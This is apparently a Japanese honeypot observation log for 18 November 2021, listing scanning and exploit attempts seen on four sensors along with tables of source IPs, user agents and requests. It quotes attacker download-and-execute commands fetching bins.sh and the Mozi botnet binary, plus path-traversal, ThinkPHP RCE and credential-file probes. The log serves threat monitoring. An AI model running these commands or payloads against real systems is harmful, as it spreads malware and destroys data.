ハニーポット(仮) 観測記録 2021/11/18分です。
特徴
共通
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Location:JP
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
を確認しました。
Location:US
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ManageEngine OPManagerの脆弱性を狙うアクセス
curlによるスキャン行為
l9exploreによるスキャン行為
Lkx-TraversalHttpPluginによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212[.]193[.]30[.]245/bins.sh; sh /tmp/bins.sh
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ManageEngine OPManagerの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 212[.]193[.]30[.]245/bins.sh; sh /tmp/bins.sh
Location:SG
ManageEngine OPManagerの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//61[.]3[.]184[.]149:38075/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:126 (前日比:+28)
US:総アクセス数:87 (前日比:+43)
UK:総アクセス数:30 (前日比:-13)
SG:総アクセス数:77 (前日比:+9)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
29 | 13.251.38.27 | United States |
2 | 18.118.121.13 | United States |
18 | 18.237.199.151 | United States |
3 | 34.220.252.136 | United States |
1 | 40.122.159.136 | United States |
1 | 41.142.88.190 | Morocco |
5 | 45.146.164.110 | Russia |
1 | 52.188.162.253 | United States |
1 | 64.227.98.253 | United States |
4 | 89.248.165.23 | United Kingdom |
1 | 95.130.176.18 | Russia |
1 | 104.248.113.209 | United States |
1 | 104.248.119.104 | United States |
8 | 135.125.244.48 | France |
1 | 137.135.96.165 | United States |
3 | 137.184.197.67 | United States |
1 | 137.184.197.79 | United States |
1 | 137.184.197.90 | United States |
2 | 157.245.70.127 | United States |
4 | 161.35.212.57 | United States |
1 | 164.92.70.115 | United States |
4 | 165.232.86.149 | United States |
1 | 172.104.131.24 | United States |
1 | 172.105.189.111 | United States |
1 | 180.149.125.170 | Mongolia |
1 | 180.149.125.172 | Mongolia |
1 | 185.100.87.136 | Seychelles |
4 | 185.142.236.40 | Seychelles |
4 | 185.163.109.66 | Romania |
1 | 192.241.200.37 | United States |
17 | 194.5.53.203 | Netherlands |
1 | 209.17.96.26 | United States |
1 | 209.17.96.250 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
17 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
33 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
37 | python-requests/2.26.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 | ||
4 | \x03 | ||
2 | \x16\x03\x01 | ||
1 | GET | /.aws/credentials | HTTP/1.1 |
1 | GET | /.aws/credentials%0A/api/.env%0A/vendor/.env%0A/lib/.env%0A/lab/.env%0A/cronlab/.env%0A/cron/.env%0A/core/.env%0A/core/app/.env%0A/core/database/.env%0A/database/.env%0A/config/.env%0A/assets/.env%0A/app/.env%0A/apps/.env%0A/uploads/.env%0A/sitemaps/.env%0A/site/.env%0A/admin/.env%0A/web/.env%0A/public/.env%0A/en/.env%0A/tools/.env%0A/v1/.env%0A/administrator/.env%0A/laravel/.env%0A/phpinfo%0A/phpinfo.php%0A/aws.yml%0A/config/aws.yml%0A/info.p | HTTP/1.1 |
34 | GET | /.env | HTTP/1.1 |
1 | GET | /.env.bak | HTTP/1.1 |
2 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /2019/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /2020/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /_profiler/phpinfo | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/.env | HTTP/1.1 |
1 | GET | /api/.env | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /asdf.php | HTTP/1.1 |
2 | GET | /aws.yml | HTTP/1.1 |
1 | GET | /beta/.env | HTTP/1.1 |
1 | GET | /blog/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /cgi-bin | HTTP/1.1 |
1 | GET | /cms/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config/.env | HTTP/1.1 |
1 | GET | /config/aws.yml | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /dashboard/phpinfo.php | HTTP/1.1 |
1 | GET | /debug/default/view?panel=config | HTTP/1.1 |
2 | GET | /explore | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /i.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
2 | GET | /info.php | HTTP/1.1 |
1 | GET | /infophp.php | HTTP/1.1 |
1 | GET | /infos.php | HTTP/1.1 |
1 | GET | /kyc/.env | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /laravel/core/.env | HTTP/1.1 |
1 | GET | /linusadmin-phpinfo.php | HTTP/1.1 |
1 | GET | /news/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /old_phpinfo.php | HTTP/1.1 |
1 | GET | /php-info.php | HTTP/1.1 |
1 | GET | /php.php | HTTP/1.1 |
1 | GET | /php_info.php | HTTP/1.1 |
2 | GET | /phpinfo | HTTP/1.1 |
3 | GET | /phpinfo.php | HTTP/1.1 |
1 | GET | /phpversion.php | HTTP/1.1 |
1 | GET | /pinfo.php | HTTP/1.1 |
1 | GET | /prod/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /shop/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml | HTTP/1.1 |
2 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml | HTTP/1.1 |
2 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /temp.php | HTTP/1.1 |
1 | GET | /test.php | HTTP/1.1 |
1 | GET | /test/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /time.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /web/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /website/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wordpress/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp1/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp2/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /index.htm | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
27 | 13.251.38.27 | United States |
1 | 39.79.32.143 | China |
2 | 45.61.186.13 | United States |
8 | 45.146.164.110 | Russia |
1 | 59.99.34.240 | India |
1 | 64.227.98.253 | United States |
4 | 80.82.78.39 | United Kingdom |
1 | 104.248.119.104 | United States |
7 | 135.125.217.54 | France |
1 | 137.184.167.80 | United States |
1 | 137.184.197.71 | United States |
1 | 137.184.197.79 | United States |
1 | 137.184.197.90 | United States |
1 | 137.184.197.91 | United States |
7 | 137.184.214.146 | United States |
1 | 149.129.50.37 | Singapore |
14 | 161.35.86.181 | United States |
2 | 180.149.125.166 | Mongolia |
1 | 190.109.236.153 | Bolivia |
1 | 192.53.170.163 | United States |
1 | 192.241.210.233 | United States |
1 | 194.48.199.78 | United Kingdom |
1 | 194.48.199.121 | United Kingdom |
1 | 209.17.96.58 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
2 | Go-http-client/1.1 |
1 | Hello, world |
1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
1 | Mozilla/2.0 |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
20 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
2 | curl/7.64.1 |
10 | l9explore/1.3.0 |
18 | python-requests/2.26.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfb\x01 | ||
1 | CONNECT | leakix[.]net:443 | HTTP/1.1 |
1 | GET | /.DS_Store | HTTP/1.1 |
1 | GET | /.aws/credentials | HTTP/1.1 |
1 | GET | /.aws/credentials%0A/api/.env%0A/vendor/.env%0A/lib/.env%0A/lab/.env%0A/cronlab/.env%0A/cron/.env%0A/core/.env%0A/core/app/.env%0A/core/database/.env%0A/database/.env%0A/config/.env%0A/assets/.env%0A/app/.env%0A/apps/.env%0A/uploads/.env%0A/sitemaps/.env%0A/site/.env%0A/admin/.env%0A/web/.env%0A/public/.env%0A/en/.env%0A/tools/.env%0A/v1/.env%0A/administrator/.env%0A/laravel/.env%0A/phpinfo%0A/phpinfo.php%0A/aws.yml%0A/config/aws.yml%0A/info.p | HTTP/1.1 |
20 | GET | /.env | HTTP/1.1 |
1 | GET | /.env.bak | HTTP/1.1 |
1 | GET | /.json | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo | HTTP/1.1 |
1 | GET | /api/search?folderIds=0 | HTTP/1.1 |
1 | GET | /asdf.php | HTTP/1.1 |
1 | GET | /aws.yml | HTTP/1.1 |
1 | GET | /bin2.php?echo2=x | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /cgi-bin | HTTP/1.1 |
1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config/aws.yml | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /debug/default/view?panel=config | HTTP/1.1 |
1 | GET | /i.php | HTTP/1.1 |
1 | GET | /idx_config/ | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
3 | GET | /info.php | HTTP/1.1 |
1 | GET | /infophp.php | HTTP/1.1 |
1 | GET | /infos.php | HTTP/1.1 |
1 | GET | /linusadmin-phpinfo.php | HTTP/1.1 |
1 | GET | /login.action | HTTP/1.1 |
1 | GET | /ok | HTTP/1.1 |
1 | GET | /old_phpinfo.php | HTTP/1.1 |
1 | GET | /php-info.php | HTTP/1.1 |
1 | GET | /php.php | HTTP/1.1 |
1 | GET | /php_info.php | HTTP/1.1 |
1 | GET | /phpinfo | HTTP/1.1 |
2 | GET | /phpinfo.php | HTTP/1.1 |
1 | GET | /phpversion.php | HTTP/1.1 |
1 | GET | /pinfo.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties | HTTP/1.1 |
1 | GET | /server-status | HTTP/1.1 |
1 | GET | /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+212[.]193[.]30[.]245/bins.sh;sh+/tmp/bins.sh | HTTP/1.1 |
1 | GET | /sitecore/shell/ClientBin/Reporting/Report.ashx | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /telescope/requests | HTTP/1.1 |
1 | GET | /temp.php | HTTP/1.1 |
1 | GET | /test.php | HTTP/1.1 |
1 | GET | /time.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//www[.]1ucn[.]com/proxychecker/index.php | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.80.108.135 | United States |
2 | 18.118.121.13 | United States |
7 | 45.146.164.110 | Russia |
1 | 49.143.32.6 | South Korea |
1 | 91.241.19.243 | Russia |
1 | 112.254.192.238 | China |
2 | 157.245.70.127 | United States |
1 | 159.223.44.111 | United States |
1 | 172.105.161.246 | United States |
1 | 180.149.125.167 | Mongolia |
1 | 180.149.125.171 | Mongolia |
1 | 185.31.175.231 | Netherlands |
1 | 192.144.113.125 | Peru |
1 | 194.48.199.78 | United Kingdom |
1 | 194.48.199.121 | United Kingdom |
4 | 198.20.69.98 | United States |
1 | 206.189.185.88 | United States |
1 | 209.17.97.66 | United States |
1 | 222.66.148.170 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | curl/7.47.0 |
2 | curl/7.64.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfc\x01 | ||
2 | GET | /.env | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /cgi-bin | HTTP/1.1 |
1 | GET | /cgi-bin/content.asp | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /explore | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+212[.]193[.]30[.]245/bins.sh;sh+/tmp/bins.sh | HTTP/1.1 |
1 | GET | /sitecore/shell/ClientBin/Reporting/Report.ashx | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
2 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 18.118.121.13 | United States |
2 | 20.55.53.144 | United States |
1 | 20.119.59.27 | United States |
7 | 45.146.164.110 | Russia |
1 | 61.3.184.149 | India |
9 | 61.246.59.131 | India |
1 | 69.162.231.236 | United States |
4 | 89.248.165.23 | United Kingdom |
1 | 104.248.113.209 | United States |
1 | 104.248.121.10 | United States |
4 | 121.173.108.200 | South Korea |
1 | 135.125.217.54 | France |
1 | 137.184.197.67 | United States |
1 | 137.184.197.71 | United States |
1 | 137.184.197.90 | United States |
1 | 137.184.197.91 | United States |
1 | 137.184.209.211 | United States |
6 | 137.184.214.146 | United States |
2 | 157.230.216.203 | United States |
3 | 163.172.159.134 | United Kingdom |
2 | 180.149.125.172 | Mongolia |
1 | 192.241.196.112 | United States |
17 | 194.5.53.203 | Netherlands |
1 | 194.48.199.78 | United Kingdom |
1 | 194.48.199.121 | United Kingdom |
1 | 209.17.96.74 | United States |
1 | 209.127.17.234 | Canada |
1 | 211.95.50.7 | China |
3 | 212.47.244.68 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
1 | Chrome/54.0 (Windows NT 10.0) |
1 | Hello, world |
4 | Mozilla/5.0 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/54.0.2952.60 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
17 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8 |
2 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
15 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
2 | curl/7.64.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | \x9e\x1e\xa4Z\x11\x90I\xc7`/\xea | ||
3 | CONNECT | blog[.]naver[.]com:80 | HTTP/1.1 |
1 | CONNECT | m[.]blog[.]naver[.]com:443 | HTTP/1.1 |
2 | CONNECT | www[.]bing[.]com:443 | HTTP/1.1 |
16 | GET | /.env | HTTP/1.1 |
1 | GET | /2019/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /2020/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&Vars[0]=md5&Vars[1][]=eq6iflgq | HTTP/1.1 |
1 | GET | /UiDsu2rm7xBXOHLfvpNGCPz3dy7 | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /blog/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /cms/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /explore | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /invoker/readonly | HTTP/1.1 |
1 | GET | /jenkins/login | HTTP/1.1 |
1 | GET | /login | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /news/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /script | HTTP/1.1 |
1 | GET | /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//61[.]3[.]184[.]149:38075/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shop/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /sitecore/shell/ClientBin/Reporting/Report.ashx | HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
1 | GET | /test/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /web/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /website/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wordpress/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | /wp/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp1/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /wp2/wp-includes/wlwmanifest.xml | HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd | HTTP/1.1 |
2 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /_ignition/execute-solution | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//jaymelevitz[.]fun/6ec062cb20689c27d7055bcda2427dc7f930f29ed796929de917f0fd308ebc608955ad729fe07bcf026cb4248b8b1a3b25d32bafc743b671d17e6eeaab719cf77861826bf086c80d48b0522b16b26fa769c3c52c19b22b48b62d1a4a965f0fd9 | HTTP/1.1 |
1 | POST | http[:]//maryblack[.]xyz/a6d4ac139c727afe40d06bbd703c4197d80c5459e6205626a11ec50b21b0a44d870bb904bf67f5dad0de328b62fbc59c4e39177ad6e4c1226a2752dee9bf7ee6c853ed7c306ec7ef32a3f5decb3d44b41c86ea2915f569efab459a0ba6d275d4 | HTTP/1.1 |